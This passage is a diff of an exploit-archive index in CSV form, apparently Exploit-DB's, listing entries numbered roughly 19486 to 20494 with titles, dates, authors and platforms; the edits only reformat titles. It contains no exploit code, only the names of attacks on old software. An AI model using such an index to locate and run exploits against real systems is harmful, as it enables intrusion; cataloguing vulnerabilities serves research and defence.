Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 @@ -16917,7 +16917,7 @@ id,file,description,date,author,platform,type,port 19585,platforms/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,local,0 19586,platforms/windows/remote/19586.c,"BTD Studio Zom-Mail 1.0.9 - Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 19587,platforms/windows/remote/19587.txt,"AN-HTTPd 1.2 b CGI Vulnerabilities",1999-11-02,UNYUN,windows,remote,0 -19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 +19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation Vulnerability",1999-10-31,"Jesús López de Aguileta",windows,remote,0 19590,platforms/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Buffer Overflow Vulnerability",1999-11-03,"Brock Tellier",unix,local,0 19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4.0/5.0,Outlook 98 - window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 @@ -16942,7 +16942,7 @@ id,file,description,date,author,platform,type,port 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2,IRIX <= 6.5.17,Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 -19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0 +19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS Vulnerability",1999-11-10,"Ussr Labs",windows,dos,0 @@ -17052,7 +17052,7 @@ id,file,description,date,author,platform,type,port 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow Vulnerability",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service Vulnerability",2000-01-13,"Ussr Labs",windows,dos,0 19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4,NetBSD <= 1.4.1,OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 -19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 Buffer Overflow Vulnerability",2000-01-21,K2,linux,local,0 +19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow Vulnerability",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions Vulnerability",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow Vulnerability",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability",2000-01-17,"Greg Hoglund",windows,remote,0 @@ -17064,7 +17064,7 @@ id,file,description,date,author,platform,type,port 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 Javascript Email Access Vulnerability",2000-02-01,"Georgi Guninski",windows,remote,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 -19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67 -3 CWD/MKD DoS Vulnerability",2000-02-03,crc,windows,dos,0 +19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) DoS Vulnerability",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 SQL Command Input Vulnerability",2000-02-03,"rain forest puppy",cgi,remote,0 19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0,Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability",2000-02-04,"Ussr Labs",windows,remote,0 @@ -17079,7 +17079,7 @@ id,file,description,date,author,platform,type,port 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink Vulnerability",2000-02-15,"Shawn Bracken",sco,local,0 19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability",2000-02-18,"Eric Stevens",windows,local,0 -19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 +19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu Vulnerability",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 Licensing Manager Symlink Vulnerability",2000-02-21,sp00n,solaris,local,0 19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 Command Injection",2012-07-12,metasploit,php,webapps,0 @@ -17122,7 +17122,7 @@ id,file,description,date,author,platform,type,port 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders Vulnerability",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0,Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 -19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4 -7 Buffer Overflow Vulnerability",2000-03-10,bladi,linux,remote,0 +19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow Vulnerability",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation Vulnerability",2000-03-11,"S. Krahmer",linux,local,0 @@ -17142,7 +17142,7 @@ id,file,description,date,author,platform,type,port 19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99,RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read Vulnerability",2000-03-27,"Quan Peng",windows,remote,0 19820,platforms/windows/remote/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 DoS Vulnerability",2000-03-25,"Presto Chango",windows,remote,0 -19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0 +19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0 19822,platforms/irix/remote/19822.c,"SGI IRIX 5.x/6.x Objectserver Vulnerability",2000-03-29,"Last Stage of Delirium",irix,remote,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 19824,platforms/multiple/remote/19824.txt,"Microsoft IIS 4.0 UNC Mapped Virtual Host Vulnerability",2000-03-30,"Adam Coyne",multiple,remote,0 @@ -17167,7 +17167,7 @@ id,file,description,date,author,platform,type,port 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 bizdb-search.cgi Remote Command Execution Vulnerability",2000-04-13,"PErfecto Technology",cgi,remote,0 19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 - Buffer Overflow Vulnerability",2000-04-14,"Richie & Beto",windows,remote,0 -19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 +19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19850,platforms/linux/local/19850.c,"RedHat Linux 6.x X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,local,0 @@ -17201,7 +17201,7 @@ id,file,description,date,author,platform,type,port 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password Vulnerability",2000-04-27,"Cerberus Security Team",windows,remote,0 19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x HTTP %% Vulnerability",2000-04-26,"Keith Woodworth",hardware,remote,0 19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib Buffer Overflow Vulnerability",2000-04-29,bladi,linux,local,0 -19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 Buffer Overflow Vulnerability",2000-05-01,"Ussr Labs",windows,dos,0 +19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow Vulnerability",2000-05-01,"Ussr Labs",windows,dos,0 19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 Warning Message Circumvention Vulnerability",2000-04-28,"Bennett Haselton",windows,dos,0 19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 @@ -17236,7 +17236,7 @@ id,file,description,date,author,platform,type,port 19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0 -19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 +19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0 @@ -17246,8 +17246,8 @@ id,file,description,date,author,platform,type,port 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype Vulnerability",2000-05-13,http-equiv,windows,remote,0 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 -19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998 -19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",2012-07-19,metasploit,windows,remote,998 +19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 -Buffer Overflow",2012-07-19,metasploit,windows,remote,998 +19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0 @@ -17303,8 +17303,8 @@ id,file,description,date,author,platform,type,port 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 Weak Encryption Vulnerability",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man /tmp symlink Vulnerability",2000-06-02,"Jason Axley",hp-ux,local,0 -19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1 -10 Buffer Overflow Vulnerability (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 -19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1 -10 Buffer Overflow Vulnerability (2)",1999-07-03,funkysh,linux,local,0 +19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow Vulnerability (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 +19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow Vulnerability (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A Mailclient Temporary Link Vulnerability",2000-06-06,"Gert Fokkema",windows,local,0 19994,platforms/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 Fragmented Packets DoS",2000-05-23,phonix,windows,dos,0 19995,platforms/cgi/remote/19995.txt,"Michael Lamont Savant WebServer 2.1 CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote,0 @@ -17329,7 +17329,7 @@ id,file,description,date,author,platform,type,port 20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore Buffer Overflow Vulnerability",2000-06-14,"Job de Haas of ITSX",solaris,local,0 20015,platforms/windows/remote/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 DoS Vulnerability",2000-07-15,"Ussr Labs",windows,remote,0 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS",2000-06-16,Prizm,windows,dos,0 -20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 +20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability",2000-06-16,"Dixie Flatline",solaris,local,0 20019,platforms/windows/remote/20019.txt,"Cart32 3.0 - ""expdate"" Administrative Information Disclosure Vulnerability",2000-05-03,cassius,windows,remote,0 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 @@ -17362,7 +17362,7 @@ id,file,description,date,author,platform,type,port 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 -20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0 +20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service Vulnerability",2000-06-27,"Adam Prime",multiple,dos,0 20053,platforms/windows/local/20053.py,"MyMp3 Player Stack .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 @@ -17422,7 +17422,7 @@ id,file,description,date,author,platform,type,port 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload Vulnerability",2012-07-27,metasploit,php,webapps,0 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,metasploit,windows,remote,0 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,metasploit,linux,remote,0 -20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 +20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi",2012-07-30,Kc57,php,webapps,0 @@ -17481,11 +17481,11 @@ id,file,description,date,author,platform,type,port 20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20178,platforms/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 DoS Vulnerability",2000-08-19,sinfony,multiple,dos,0 20179,platforms/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",unix,local,0 -20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 Buffer Overflow Vulnerability",2000-08-28,wildcoyote,windows,remote,0 +20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow Vulnerability",2000-08-28,wildcoyote,windows,remote,0 20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 KDC Spoofing Vulnerability",2000-08-28,"Dug Song",multiple,remote,0 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x File Attachment Vulnerability",2000-08-30,Timescape,windows,remote,0 20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 author.file Write Vulnerability",2000-08-29,n30,cgi,remote,0 -20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1,SpyNet CaptureNet 3.0.12 Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 +20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1,SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 @@ -17526,14 +17526,14 @@ id,file,description,date,author,platform,type,port 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/remote/20225.pl,"Alt-N MDaemon 3.1.1 DoS Vulnerability",1999-12-01,"Ussr Labs",windows,remote,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 -20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 +20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x SMTP Content Filtering Evasion Vulnerability",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS Vulnerability",2000-09-21,"Delphis Consulting",windows,dos,0 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal Vulnerability",2000-09-21,anon,multiple,remote,8002 -20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 +20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - ""From:"" Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 Domain Modification Vulnerability",2000-09-24,"Weihan Leow",cgi,remote,0 @@ -17623,12 +17623,12 @@ id,file,description,date,author,platform,type,port 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0 -20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 +20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0 -20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 -20332,platforms/hardware/remote/20332.pl,"Ascend R 4.5 Ci12 Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 -20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0 +20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 +20332,platforms/hardware/remote/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 +20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x Brute-Force Vulnerability",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - (.htw) Cross-Site Scripting Vulnerability",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/remote/20336.txt,"Unify eWave ServletExec 3.0 c DoS Vulnerability",2000-10-30,"Foundstone Labs",multiple,remote,0 @@ -17683,7 +17683,7 @@ id,file,description,date,author,platform,type,port 20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 Insecure Environment Variables Vulnerability",2000-11-04,fish,linux,local,0 20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 registrar Local Arbitrary File Read Vulnerability",2000-11-08,"J.A. Gutierrez",hp-ux,local,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution Vulnerability",2000-11-07,rpc,cgi,remote,0 -20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 Denial of Service Vulnerability",2000-11-01,"Fabio Pietrosanti",linux,dos,0 +20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service Vulnerability",2000-11-01,"Fabio Pietrosanti",linux,dos,0 20390,platforms/php/webapps/20390.txt,"Joomla FireBoard Component (com_fireboard) SQL Injection Vulnerability",2012-08-09,Vulnerability-Lab,php,webapps,0 20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0 20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution",2012-08-10,metasploit,windows,remote,0 @@ -17784,8 +17784,8 @@ id,file,description,date,author,platform,type,port 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x File Overwrite Vulnerability",2000-12-11,mat,linux,local,0 20494,platforms/linux/remote/20494.pl,"RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service 